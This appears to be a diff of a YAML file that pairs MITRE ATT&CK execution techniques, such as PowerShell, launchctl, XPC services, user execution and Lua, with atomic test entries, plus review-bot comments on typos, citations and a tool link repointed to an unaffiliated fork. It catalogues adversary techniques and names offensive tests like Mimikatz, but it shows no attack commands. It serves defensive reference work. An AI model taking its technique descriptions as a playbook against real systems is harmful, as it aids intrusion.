Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -44365,6 +44675,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -44375,16 +44686,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -44415,9 +44726,6 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests:
- name: AutoIt Script Execution
@@ -44463,7 +44771,7 @@ execution:
name: powershell
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -44529,39 +44837,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -44570,6 +44852,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -44582,19 +44865,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
@@ -44637,7 +44943,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
@@ -44653,72 +44959,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
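Review bot: typo in the new bullet `* Coerceing users to copy, paste, and execute malicious code manually`; it should read `Coercing`, and since this block scalar is rendered verbatim on the technique page it is worth fixing before merge. Also note that the two citations that previously closed the whole "Adversaries may also deceive users" sentence now attach only to the JavaScript bullet (`(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)`), leaving the Remote Access Software and download-and-execute bullets uncited; confirm that narrowing is intended.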
@@ -44726,7 +45035,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -44741,7 +45054,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -44768,6 +45081,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
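Review bot: the new `Reliaquest-execution` entry spells the vendor `Reliaquest` in its description while the contributor added in the same change is `ReliaQuest`; align the capitalization in the description (the source_name key can stay as is since the description text cites it).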
@@ -44778,15 +45095,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -44803,7 +45124,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -44851,7 +45172,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -44884,7 +45205,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests:
- name: Radmin Viewer Utility
@@ -44994,7 +45314,7 @@ execution:
choco install -y 7zip
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -45055,8 +45375,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
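Review bot: the `Github PSAttack` reference is repointed from the author's repository `https://github.com/jaredhaight/PSAttack` to `https://github.com/Exploit-install/PSAttack-1`, which is an unaffiliated fork. A fork can diverge from, or be replaced under, the cited original, and a tool reference is exactly the kind of link readers follow to download code; if the original repository is gone, prefer an archived snapshot of it (this file already uses `web.archive.org` for the Cyphort EvilBunny reference) over a third-party copy, and keep the `Retrieved` date tied to whatever URL is actually cited.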
@@ -45078,7 +45399,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests:
- name: Mimikatz
@@ -45627,7 +45947,7 @@ execution:
name: powershell
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -45705,14 +46025,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -45770,36 +46089,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -45820,23 +46114,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests:
- name: Cobalt Strike Artifact Kit pipe
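Review bot: for T1559 this and the preceding hunk are almost entirely a key reorder: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted at the top of the object and re-added, unchanged, further down. Only `modified`, `x_mitre_version` (1.2 to 1.3), the new `x_mitre_deprecated`/`revoked` keys and the dropped `x_mitre_permissions_required` are real changes. If the generator can emit keys in a canonical order, these diffs become reviewable; as it stands the substantive change is buried. The removal of `x_mitre_permissions_required` is at least consistent with the other reordered techniques in this change (T1569 and T1204.001 drop it too).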
@@ -45994,6 +46309,70 @@ execution:
'
name: command_prompt
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
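Review bot: in the new T1059.011 description the two lines following `via scripts (.lua` and `through the struct lua_State` (the ones reading `), or from Lua-embedded programs` and `).(Citation: Lua main page)(Citation: Lua state)`) carry no `+` prefix even though every other line of this hunk is an addition. Either the inline code markup around `.lua` and `lua_State` was lost when the description was flattened into the `|-` block scalar, or the hunk is malformed; confirm the YAML round-trips and that the rendered sentence reads `via scripts (.lua), or from Lua-embedded programs (through the struct lua_State)`. Minor: the `Lua Proofpoint Sunseed` description has a doubled period in `The Proofpoint Threat Research Team..`.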
@@ -46022,7 +46401,7 @@ execution:
